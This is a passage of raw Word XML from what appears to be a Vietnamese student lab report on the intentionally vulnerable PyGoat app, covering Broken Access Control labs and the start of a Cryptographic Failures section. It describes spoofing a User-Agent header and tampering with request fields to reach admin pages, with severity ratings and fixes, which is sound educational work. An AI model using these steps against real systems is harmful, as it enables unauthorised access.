          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="004D4BC1">
        <w:t>iến hành thay đổi trường User-Agent: pygoat-admin để giả mạo thực hiện ở trình duyệt pygoat-admin</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A3554" w14:textId="0EE271F5" w:rsidR="00724CB8" w:rsidRPr="004D4BC1" w:rsidRDefault="00724CB8" w:rsidP="004D4BC1">
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">Lưu ý, bởi vì điều này không được thực hiện ở vai trò là một trình duyệt thông thường nên </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">việc cần làm là </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>thực hiện bắt gói tin và tạo thành 1 gói tin ở mục repeater:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ACC8BC" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="007D4FFF" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="007D4FFF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10DDEA98" wp14:editId="2C7D9100">
            <wp:extent cx="6115050" cy="2617470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2065246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46814" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2617470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D9961" w14:textId="203A8319" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="007D4FFF">
        <w:t xml:space="preserve">Và đã có được Key: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D4FFF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0NLY_F0R_4DM1N5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> , hay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C245D" w14:textId="081CCFAB" w:rsidR="00724CB8" w:rsidRPr="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00B03E0A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68308749" wp14:editId="28C2F701">
            <wp:extent cx="6115050" cy="2669540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="253512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12549" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2669540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73655438" w14:textId="79E56EB3" w:rsidR="00724CB8" w:rsidRPr="009D0400" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="001F070A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="001F070A">
        <w:t>việc thiếu kiểm soát chặt chẽ về quyền truy cập, cho phép kẻ tấn công lợi dụng thông tin để giả mạo trình duyệt của admin. Khi kẻ tấn công có thể thay đổi thông tin User-Agent để giả danh quyền admin, điều này dẫn đến nguy cơ xâm nhập trái phép vào các chức năng nhạy cảm hoặc khu vực chỉ dành riêng cho người dùng có đặc quyền cao. Nếu lỗ hổng không được khắc phục, có thể dẫn đến rò rỉ dữ liệu quan trọng, gây ra thiệt hại lớn cho hệ thống và tiềm ẩn rủi ro nghiêm trọng về an ninh thông tin và quyền riêng tư của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C9C90A" w14:textId="173DCDDD" w:rsidR="00724CB8" w:rsidRPr="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>Đề xuất triển khai các biện pháp như kiểm tra và lọc gói tin, cùng với việc thiết lập và kiểm soát cơ chế truy cập để ngăn chặn việc xâm nhập vào hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3867AEE3" w14:textId="40B715E9" w:rsidR="00724CB8" w:rsidRDefault="00031203" w:rsidP="00724CB8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc182909828"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3D1FB90B" w14:textId="50BC5171" w:rsidR="00D12B8F" w:rsidRPr="00D12B8F" w:rsidRDefault="00D12B8F" w:rsidP="00D12B8F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12B8F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00D12B8F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/broken_access_lab_3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46CBCCE9" w14:textId="16474C0C" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t>Broken Access Control – Lab 3</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC8CBE" w14:textId="07DA36E8" w:rsidR="00724CB8" w:rsidRPr="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A7605" w:rsidRPr="004D4BC1">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">ỗi khi </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1" w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve">điều chỉnh trên gói tin, </w:t>
      </w:r>
      <w:r w:rsidR="004D4BC1" w:rsidRPr="004D4BC1">
        <w:t>thực hiện</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4BC1">
        <w:t xml:space="preserve"> đăng nhập với quyền admin</w:t>
      </w:r>
      <w:r w:rsidR="001A7605" w:rsidRPr="004D4BC1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6938815A" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D09C87" w14:textId="06FF5B52" w:rsidR="00724CB8" w:rsidRPr="001A7605" w:rsidRDefault="004D4BC1" w:rsidP="00724CB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00E41FA3">
        <w:t xml:space="preserve">hử </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:t>đăng nhập với</w:t>
      </w:r>
      <w:r w:rsidR="001A7605">
        <w:t xml:space="preserve"> quyền</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> admin: </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin_pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521189F5" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2CD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67ED80FB" wp14:editId="1D7A01BD">
            <wp:extent cx="6115050" cy="1151890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94008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8242" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1151890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BE2CD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE2CD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA1805B" wp14:editId="0AC614F4">
            <wp:extent cx="6115050" cy="762635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1880662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62877" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="762635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E66E93" w14:textId="4EE67AEA" w:rsidR="00724CB8" w:rsidRPr="00E41FA3" w:rsidRDefault="004D4BC1" w:rsidP="00724CB8">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00E41FA3">
        <w:t xml:space="preserve">hử đăng nhập với </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quyền </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00E41FA3">
        <w:t xml:space="preserve">John: </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00E41FA3">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00E41FA3">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00E41FA3">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reaper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742CA676" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00BE2CD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C1E8BB6" wp14:editId="6AE2B25C">
            <wp:extent cx="6115050" cy="911225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="626912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12471" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="911225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFAEB62" w14:textId="4A7E5793" w:rsidR="00724CB8" w:rsidRPr="001A7605" w:rsidRDefault="00541D20" w:rsidP="001A7605">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> Kiểm tra gói tin gởi tới server của admin và John</w:t>
      </w:r>
      <w:r w:rsidR="001A7605">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08250BCF" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="001A7605" w:rsidRDefault="00724CB8" w:rsidP="001A7605">
      <w:r w:rsidRPr="001A7605">
        <w:t>- admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042CBC2" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001769C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15E16D55" wp14:editId="042C1DBD">
            <wp:extent cx="5162815" cy="3105310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1346560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560449" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5162815" cy="3105310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8F96DC" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r>
        <w:t>- John:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389B5768" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001769C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B7D968E" wp14:editId="0C059696">
            <wp:extent cx="5150115" cy="3473629"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1063770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70815" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5150115" cy="3473629"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74F065" w14:textId="4917670C" w:rsidR="00724CB8" w:rsidRPr="00541D20" w:rsidRDefault="00724CB8" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:t>2 trường thông tin cuối này khác nhau. Đề bài gợi ý</w:t>
      </w:r>
      <w:r w:rsidR="00541D20" w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>thay đổi trường thông tin của John thành của admin và truy cập vào trang admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7587A" w14:textId="4A61D065" w:rsidR="00724CB8" w:rsidRPr="009D0400" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="003E1537">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D6EB988" wp14:editId="2BD0635C">
            <wp:extent cx="6115050" cy="2044700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1327769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69215" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2044700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3019148A" w14:textId="2C3A39AE" w:rsidR="00724CB8" w:rsidRPr="00541D20" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="001F070A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00541D20" w:rsidRPr="00541D20">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="001F070A">
        <w:t>kẻ tấn công có thể truy cập trái phép vào các khu vực admin chỉ bằng cách thay đổi thông tin gói tin. Điều này có thể dẫn đến rủi ro lớn cho hệ thống, bao gồm lộ thông tin nhạy cảm và mất kiểm soát quản trị.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF14E0A" w14:textId="54F8CBA6" w:rsidR="00151DDF" w:rsidRPr="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>Đề xuất triển khai các biện pháp như kiểm tra và lọc gói tin, cùng với việc thiết lập và kiểm soát cơ chế truy cập để ngăn chặn việc xâm nhập vào hệ thống.</w:t>
      </w:r>
      <w:r w:rsidR="00151DDF" w:rsidRPr="00541D20">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746ACA7" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc182909829"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A02:2021 – Cryptographic Failures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5C8AD0B1" w14:textId="116A3DC7" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc182909830"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="5017F5AD" w14:textId="000D09ED" w:rsidR="005D0569" w:rsidRPr="00541D20" w:rsidRDefault="001A7605" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t>Điều đầu tiên phải xác định nhu cầu bảo vệ dữ liệu khi ở trạng thái truyền và trạng thái nghỉ. Ví dụ nh</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> mật khẩu, thông tin số thẻ tín dụng, bản ghi sức khoẻ, thông tin cá nhân và bí mật doanh nghiệp cần đ</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t>ợc bảo vệ. Tham khảo thêm các luật riêng t</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> về dữ liệu: Quy định bảo vệ dữ liệu chung (GDPR) của EU, hoặc các quy định: ví dụ nh</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> bảo vệ dữ liệu tài chính chẳng hạn nh</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> tiêu chuẩn bảo mật dữ liệu PCI (PCI DSS). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D01A9E" w14:textId="712837EE" w:rsidR="00A132BF" w:rsidRPr="00541D20" w:rsidRDefault="001A7605" w:rsidP="00541D20">
      <w:r w:rsidRPr="00541D20">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t xml:space="preserve">Lỗi mật mã là nguyên nhân chính dẫn đến lỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="00541D20">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t>iết lỗ thông tin dữ liệu nhạy cảm. Các CWE có thể tham khảo nh</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00541D20">
        <w:t xml:space="preserve"> CWE-259: Sử dụng mật khẩu mã hoá cứng, CWE-327: Thuật toán mã hoá bị hỏng hoặc rủi ro, CWE-331...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0707C208" w14:textId="02BCF8C8" w:rsidR="0050178A" w:rsidRDefault="0050178A" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
